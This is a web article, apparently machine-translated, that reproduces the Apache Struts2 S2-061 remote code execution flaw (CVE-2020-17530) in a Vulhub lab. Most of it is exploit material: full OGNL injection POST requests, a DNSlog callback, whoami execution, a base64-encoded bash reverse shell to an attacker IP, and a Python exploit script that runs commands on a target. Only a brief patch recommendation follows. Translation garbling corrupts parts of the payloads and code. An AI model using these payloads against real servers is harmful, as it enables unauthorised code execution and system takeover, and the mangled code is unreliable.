In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-23 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
In this issue, the editor will bring you about how to reproduce the remote code execution vulnerabilities of Apache Struts2 061. the article is rich in content and analyzes and describes it from a professional point of view. I hope you can get something after reading this article.
Brief introduction of 0x00 vulnerability
Apache Struts2 framework is a Web framework for developing Java EE network applications. Apache Struts disclosed the S2-061 Struts remote code execution vulnerability on December 08, 2020, and developers used% {… Syntax, so that an attacker can construct a Payload to cause remote code execution.
The vulnerability number is CVE-2020-17530, vulnerability level: high risk, vulnerability score: 7.5
S2-061 is the bypass of S2-059 sandboxie!
0x01 affects version
Apache Struts2:2.0.0-2.5.25
Recurrence of 0x02 vulnerabilities
Loophole project
Https://github.com/vulhub/vulhub/tree/master/struts2/s2-061
Virtual machine deployment docker installation Vulhub one click to build vulnerability test range environment.
Docker-compose up-d
1. Launch the vulnerability environment
2. Access the vulnerability environment
3. Test whether the vulnerability exists.
% 25% 7 baked% 27yunzui% 27% 2b+ (520+%2b+520). ToString ()% 7d
Execution effect
Http://192.168.60.139:8080/?id=%25%7b+%27yunzui%27+%2b+(520+%2b+520).toString()%7d
4. Vulnerability exploitation
1.DNSlog outbound verification
Domain name generation rtlyas.dnslog.cn
POST / index.action HTTP/1.1
Host: 192.168.60.139:8080
Accept-Encoding: gzip, deflate
Accept: * / *
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 846
-WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name= "id"
% {(# instancemanager=#application ["org.apache.tomcat.InstanceManager"]). (# stack=#attr ["com.opensymphony.xwork2.util.ValueStack.ValueStack"]). (# bean=#instancemanager.newInstance ("org.apache.commons.collections.BeanMap")). (# bean.setBean (# stack)). (# context=#bean.get ("context")). (# bean.setBean (# context). (# macc=#bean.get ("memberAccess")). (# bean.setBean ( # macc)). (# emptyset=#instancemanager.newInstance ("java.util.HashSet")). (# bean.put ("excludedClasses") # emptyset)). (# bean.put ("excludedPackageNames", # emptyset)). (# arglist=#instancemanager.newInstance ("java.util.ArrayList")). (# arglist.add ("ping rtlyas.dnslog.cn")). (# execute=#instancemanager.newInstance ("freemarker.template.utility.Execute")). (# execute.exec (# arglist))}
-WebKitFormBoundaryl7d1B1aGsV2wcZwF--
DNGlog parsing records are found to be available on the network.
2.exp executes commands and executes whoami
Method one
POST / index.action HTTP/1.1
Host: 192.168.60.139:8080
Accept-Encoding: gzip, deflate
Accept: * / *
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 831
-WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name= "id"
% {(# instancemanager=#application ["org.apache.tomcat.InstanceManager"]). (# stack=#attr ["com.opensymphony.xwork2.util.ValueStack.ValueStack"]). (# bean=#instancemanager.newInstance ("org.apache.commons.collections.BeanMap")). (# bean.setBean (# stack)). (# context=#bean.get ("context")). (# bean.setBean (# context). (# macc=#bean.get ("memberAccess")). (# bean.setBean ( # macc)). (# emptyset=#instancemanager.newInstance ("java.util.HashSet")). (# bean.put ("excludedClasses") # emptyset)). (# bean.put ("excludedPackageNames", # emptyset)). (# arglist=#instancemanager.newInstance ("java.util.ArrayList")). (# arglist.add ("whoami")). (# execute=#instancemanager.newInstance ("freemarker.template.utility.Execute")). (# execute.exec (# arglist))}
-WebKitFormBoundaryl7d1B1aGsV2wcZwF--
Method two
POST / index.action HTTP/1.1
Host: 192.168.60.139:8080
Accept-Encoding: gzip, deflate
Accept: * / *
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 1365
-WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name= "id"
% {
(# request.map=#application.get ('org.apache.tomcat.InstanceManager'). NewInstance (' org.apache.commons.collections.BeanMap')). ToString (). Substring (0P0) +
(# request.map.setBean (# request.get ('struts.valueStack')) = = true) .toString () .substring (0pen0) +
(# request.map2=#application.get ('org.apache.tomcat.InstanceManager'). NewInstance (' org.apache.commons.collections.BeanMap')). ToString (). Substring (0P0) +
(# request.map2.setBean (# request.get ('map'). Get (' context')) = = true) .toString () .substring (0L0) +
(# request.map3=#application.get ('org.apache.tomcat.InstanceManager'). NewInstance (' org.apache.commons.collections.BeanMap')). ToString (). Substring (0P0) +
(# request.map3.setBean (# request.get ('map2'). Get (' memberAccess')) = = true) .toString () .substring (0L0) +
(# request.get ('map3'). Put (' excludedPackageNames',#application.get ('org.apache.tomcat.InstanceManager'). NewInstance (' java.util.HashSet')) = = true). ToString (). Substring (0mem0) +
(# request.get ('map3'). Put (' excludedClasses',#application.get ('org.apache.tomcat.InstanceManager'). NewInstance (' java.util.HashSet')) = = true). ToString (). Substring (0mem0) +
(# application.get ('org.apache.tomcat.InstanceManager'). NewInstance (' freemarker.template.utility.Execute'). Exec ({'whoami'}))
}
-WebKitFormBoundaryl7d1B1aGsV2wcZwF--
3. Bounce shell command
Transcode the bash bounce command at the following online address
Bash-I > & / dev/tcp/192.168.60.129/8888 0 > & 1
Http://www.jackson-t.ca/runtime-exec-payloads.html
POST / index.action HTTP/1.1
Host: 192.168.60.139:8080
Accept-Encoding: gzip, deflate
Accept: * / *
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 1456
-WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name= "id"
% {
(# request.map=#application.get ('org.apache.tomcat.InstanceManager'). NewInstance (' org.apache.commons.collections.BeanMap')). ToString (). Substring (0P0) +
(# request.map.setBean (# request.get ('struts.valueStack')) = = true) .toString () .substring (0pen0) +
(# request.map2=#application.get ('org.apache.tomcat.InstanceManager'). NewInstance (' org.apache.commons.collections.BeanMap')). ToString (). Substring (0P0) +
(# request.map2.setBean (# request.get ('map'). Get (' context')) = = true) .toString () .substring (0L0) +
(# request.map3=#application.get ('org.apache.tomcat.InstanceManager'). NewInstance (' org.apache.commons.collections.BeanMap')). ToString (). Substring (0P0) +
(# request.map3.setBean (# request.get ('map2'). Get (' memberAccess')) = = true) .toString () .substring (0L0) +
(# request.get ('map3'). Put (' excludedPackageNames',#application.get ('org.apache.tomcat.InstanceManager'). NewInstance (' java.util.HashSet')) = = true). ToString (). Substring (0mem0) +
(# request.get ('map3'). Put (' excludedClasses',#application.get ('org.apache.tomcat.InstanceManager'). NewInstance (' java.util.HashSet')) = = true). ToString (). Substring (0mem0) +
(# application.get ('org.apache.tomcat.InstanceManager'). NewInstance (' freemarker.template.utility.Execute') .exec ({'bash-c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjYwLjEyOS84ODg4ICAwPiYx} | {base64,-d} | {bash,-i}'}))
}
-WebKitFormBoundaryl7d1B1aGsV2wcZwF--
It is found that shell can be rebounded successfully.
4. Python script verification
# encoding=utf-8
Import requests
Import sys
From lxml import etree
Def exp (url,cmd):
Payload= "% 25% 7b (% 27Powered_by_Unicode_Potats0%2cenjoy_it%27). (% 23UnicodeSec+%3d+%23application%5b%27org.apache.tomcat.InstanceManager%27%5d). (% 23potats0%3d%23UnicodeSec.newInstance (% 27org.apache.commons.collections.BeanMap%27)). (% 23stackvalue%3d%23attr%5b%27struts.valueStack%27%5d). (% 23potats0.setBean (% 23stackvalue)). (% 23context%3d%23potats0.get (% 27context%27)). (% 23potats0.setBean (% 23context)). (% 23sm%3d%23potats0.get (% 27memberAccess%27)). (% 23emptySet%3d%23UnicodeSec.newInstance (% 27java.util.HashSet%27)). (% 23potats0.setBean (% 23sm)). (% 23potats0.put (% 27excludedClasses%27%2c%23emptySet)). (% 23potats0.put (% 27excludedPackageNames%27%2c%23emptySet)). (% 23exec%3d%23UnicodeSec.newInstance (% 27freemarker.template.utility.Execute%27)). (% 23cmd%3d % 7b%27 "+ cmd+"% 27% 7d). (% 23res%3d%23exec.exec (% 23cmd))% 7d "
Tturl=url+ "/? id=" + payload
R=requests.get (tturl)
Page=r.text
# etree=html.etree
Page=etree.HTML (page)
Data = page.xpath ('/ / a [@ id] / @ id')
Print (data [0])
If _ _ name__=='__main__':
Print ('+-- +')
Print ('+ EXP: python struts2-061-poc.py http://8.8.8.8:8080 id +')
Print ('+ VER: Struts 2.0.0-2.5.25 +')
Print ('+-- +')
Print ('+ S2-061 RCE & & CVE-2020-17530 +')
Print ('+-- +')
If len (sys.argv)! = 3:
Print ("[+] ussage: http://ip:port command")
Print ("[+] =")
Sys.exit ()
Url=sys.argv [1]
Cmd=sys.argv [2]
Exp (url,cmd)
Execution
Python CVE-2020-17530.py http://192.168.60.139:8080 whoami
0x03 repair recommendation
Upgrade to Struts version 2.5.26 and download it from:
Version Notes 2.5.26
Https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.26
The above is the editor for you to share how to carry out Apache Struts2 061remote code execution vulnerabilities are repeated, if you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.
12
Report
